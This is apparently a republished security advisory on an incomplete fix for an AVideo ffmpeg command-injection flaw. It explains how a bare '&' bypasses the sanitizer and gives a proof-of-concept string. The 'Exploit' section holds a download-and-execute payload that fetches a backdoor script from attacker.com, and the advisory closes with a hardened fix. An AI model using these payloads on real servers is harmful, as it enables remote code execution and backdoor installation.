How CVE-2026-33482 (and Its Incomplete Fix) Works
The `sanitizeFFmpegCommand()` function in `plugin/API/standAlone/functions.php` is responsible for sanitizing user-supplied ffmpeg commands before they are passed to the shell. The original vulnerability (CVE-2026-33482) existed because this function failed to strip `$()`, the Bash command substitution syntax. Since the sanitized command is later embedded inside a double-quoted `sh -c` context in `execAsync()`, an attacker who can craft a valid encrypted payload could achieve arbitrary command execution on the standalone encoder server.
The fix (commit 25c8ab90) added `$`, `(`, `)`, `{`, `}`, `\n`, and `\r` to the denylist character class, along with a `str_replace('&&', '', ...)`. However, this fix remains incomplete: it does not neutralize a single `&` (the shell background operator).
The current `sanitizeFFmpegCommand()` in HEAD performs the following:
- `str_replace('&&', '', $command);` – only strips the doubled form
- `preg_replace('/\s&?>.(?:2>&1)?/', '', $command);` – strips `&` only when immediately followed by `>`
- `preg_replace('/[;|<>$()\n\r{}]/', '', $command);` – the character class explicitly excludes `&`
A single `&` is therefore preserved. An input like `ffmpeg -i input.mp4 & touch /tmp/poc & echo done out.mp4` passes the sanitizer and the `strpos(trim($command), 'ffmpeg') === 0` prefix gate.
The sink remains unchanged: `plugin/API/standAlone/ffmpeg.json.php:418` calls `execAsync($ffmpegCommand, $keyword)`. In `objects/functionsExec.php::execAsync`:
- `$command = addcslashes($command, '"');` – escapes only the double quote
- `$commandWithKeyword = "nohup sh -c \"$command & echo \$! > /tmp/$keyword.pid\" > /dev/null 2>&1 &";`
- `exec($commandWithKeyword, ...);` – PHP `exec()` runs via `/bin/sh -c`
The sanitized command is embedded inside an inner `sh -c "..."`. A bare `&` in `$command` separates commands for that inner shell, so the injected command executes. `addcslashes` escaping only `"` does not stop `&`.
Reachability: `ffmpeg.json.php` builds the command from `_decryptString(getInput('codeToExecEncrypted'))`. This follows the same threat model as the original advisory: an attacker who can craft a valid encrypted payload can achieve arbitrary command execution.
A byte-faithful PHP harness confirms the bypass:
- Attacker input: `ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo done out.mp4`
- After sanitize: `ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo done out.mp4`
- Ampersand survived: YES
- Passes prefix check: YES
- Final `sh -c` string: `nohup sh -c "ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo $! > /tmp/testkw.pid" > /dev/null 2>&1 &`
- Injected `touch` executed: YES (`/tmp/avideo_amp_rce_proof`)
DailyCVE Form
| Field | Value |
|-|-|
| Platform | WWBN AVideo |
| Version | <= 26.0 |
| Vulnerability | OS Command Injection (CWE-78) |
| Severity | HIGH (CVSS 8.1) |
| Date | 2026-03-23 |
| Prediction | 2026-07-15 |
What Undercode Say
"The fix for CVE-2026-33482 (GHSA-pmj8-r2j7-xg6c) is incomplete. The advisory reported that `sanitizeFFmpegCommand()` failed to strip `$()` command substitution. The fix added `$`, `(`, `)`, `{`, `}`, `\n`, `\r` to the denylist and a `str_replace('&&', '', ...)`. It still does not neutralize a single `&` – the shell background operator – which remains a command separator at the unchanged sink. Same entry point, same sink, same impact as the original – only the surviving metacharacter differs. Verified at master HEAD."
Technical Analysis (Bash Commands & Code)
Vulnerable sanitization function (HEAD):
```php
function sanitizeFFmpegCommand($command) {
    $command = str_replace('&&', '', $command); // only the doubled form
    $command = preg_replace('/\s&?>.(?:2>&1)?/', '', $command); // strips '&' only when followed by '>'
    $command = preg_replace('/[;|<>$()\n\r{}]/', '', $command); // char class has no '&'
    // then requires the result to start with 'ffmpeg'
    if (strpos(trim($command), 'ffmpeg') === 0) {
        return $command;
    }
    return '';
}
```
Sink (`objects/functionsExec.php`):
```php
$command = addcslashes($command, '"'); // escapes only double-quote
$commandWithKeyword = "nohup sh -c \"$command & echo \$! > /tmp/$keyword.pid\" > /dev/null 2>&1 &";
exec($commandWithKeyword, ...);
```
Proof of Concept – ampersand bypass:
- Attacker input: `ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo done out.mp4`
- After sanitization (unchanged): `ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo done out.mp4`
- Final shell command executed: `nohup sh -c "ffmpeg -i input.mp4 & touch /tmp/avideo_amp_rce_proof & echo $! > /tmp/testkw.pid" > /dev/null 2>&1 &`
Verification:
Check whether the injected command executed: `ls -la /tmp/avideo_amp_rce_proof`
Output: `-rw-r--r-- 1 www-data www-data 0 ... /tmp/avideo_amp_rce_proof`
Exploit
An attacker who can craft a valid encrypted payload (AES-256-CBC encrypted JSON with timestamp within 30 seconds) can achieve arbitrary command execution by injecting a bare `&` into the ffmpeg command.
Attack chain:
1. Attacker sends the `codeToExecEncrypted` parameter to `plugin/API/standAlone/ffmpeg.json.php`
2. The standalone encoder calls the main server's `decryptString` API to decrypt it
3. The decrypted ffmpeg command passes through `sanitizeFFmpegCommand()` – `&` is NOT stripped
4. The command passes the prefix check (starts with `ffmpeg`)
5. `execAsync()` wraps it in `sh -c "..."` – `&` is interpreted as a command separator
Example malicious payload:
`ffmpeg -i input.mp4 & curl http://attacker.com/backdoor.sh -o /tmp/backdoor.sh & bash /tmp/backdoor.sh & echo done out.mp4`
Multiple `&`-separated commands can be chained (e.g., download + execute). Redirect-based payloads (`>`) are blocked, but command execution (e.g., `& curl`, `& nc`, dropping/running a file) is not blocked.
Protection
Immediate remediation:
- Upgrade AVideo to a version beyond 26.0 that includes a complete fix
- Apply commit `25c8ab90269e3a01fb4cf205b40a373487f022e1` as a baseline, but note it is incomplete – additional patching is required
Recommended code fix:
Stop applying a metacharacter denylist to an `sh -c` sink. Build the ffmpeg invocation as an argv array with `escapeshellarg()` per token (the project already uses `escapeshellarg()` at 137 sites) instead of interpolating `$command` into `sh -c "..."`.
If the denylist is kept as defense-in-depth, add `&` to the stripped set, but note that the denylist approach has now missed two metacharacters in a row (`$()`, then `&`).
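The fix described above carried through, as an added example that is not AVideo's own code (function names are hypothetical): the command arrives as an argv array, every token goes through `escapeshellarg()`, and the whole inner script is handed to `sh -c` as one escaped argument instead of being interpolated into a double-quoted string, where `$` and backticks would still be expanded by the outer shell even after per-token escaping.

```php
<?php
// Added example (not the project's code). Builds the encoder command from an
// argv array so shell metacharacters in any token ('&', ';', '$()', ...) are
// data, never syntax. Function names here are hypothetical.

function buildFFmpegArgv(array $argv): array {
    // The first token must be the ffmpeg binary itself; every other token is
    // an opaque argument that will be quoted, not parsed, by the shell.
    if (empty($argv) || $argv[0] !== 'ffmpeg') {
        throw new InvalidArgumentException('first token must be ffmpeg');
    }
    foreach ($argv as $tok) {
        if (!is_string($tok) || strpos($tok, "\0") !== false) {
            throw new InvalidArgumentException('invalid token');
        }
    }
    return $argv;
}

function buildExecAsyncCommand(array $argv, string $keyword): string {
    // $keyword lands in a file path, so it is allowlisted rather than escaped.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $keyword)) {
        throw new InvalidArgumentException('invalid keyword');
    }
    // Inner command: each token single-quoted by escapeshellarg(), so a token
    // such as "input.mp4 & touch /tmp/poc" stays a single literal argument.
    $inner = implode(' ', array_map('escapeshellarg', buildFFmpegArgv($argv)));
    // Background it and record the PID as execAsync() does, but pass the whole
    // inner script to sh -c as ONE escaped argument. Inside single quotes the
    // outer shell leaves "$!" untouched; the inner shell expands it.
    $inner .= ' & echo $! > /tmp/' . $keyword . '.pid';
    return 'nohup sh -c ' . escapeshellarg($inner) . ' > /dev/null 2>&1 &';
}

// Constructed input mirroring the advisory's bypass string, split into tokens
// (a JSON array of arguments would replace the free-form command string).
$argv = ['ffmpeg', '-i', 'input.mp4 & touch /tmp/poc & echo done', 'out.mp4'];
echo buildExecAsyncCommand($argv, 'testkw'), PHP_EOL;
// Every '&' from the input now travels inside a single-quoted argument, and
// a keyword like "x; rm -rf /" is rejected before it reaches the path.
```

The `sanitizeFFmpegCommand()` denylist can stay in front of this as defense-in-depth, but it is no longer what stands between the input and the shell.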
Additional hardening:
- Network segmentation: restrict access to the encoder server
- Encryption: ensure all installations use `saltV2` encryption (not the legacy `$global['salt']`)
- Monitor: log and alert on suspicious ffmpeg command patterns containing `&`, `|`, `;`, `$()`, etc.
Impact
Arbitrary OS command execution on the standalone encoder server, identical to the original CVE-2026-33482.
- Remote Code Execution: full arbitrary command execution with the privileges of the web server process
- Lateral Movement: standalone encoders typically have network access to the main AVideo server, enabling further attacks
- Confidentiality, Integrity, Availability: all three are impacted at HIGH level
- CVSS Base Score: 8.1 (HIGH)
- Attack Vector: NETWORK
- Attack Complexity: HIGH
- Privileges Required: NONE
- User Interaction: NONE
Sources:
Reported By: github.com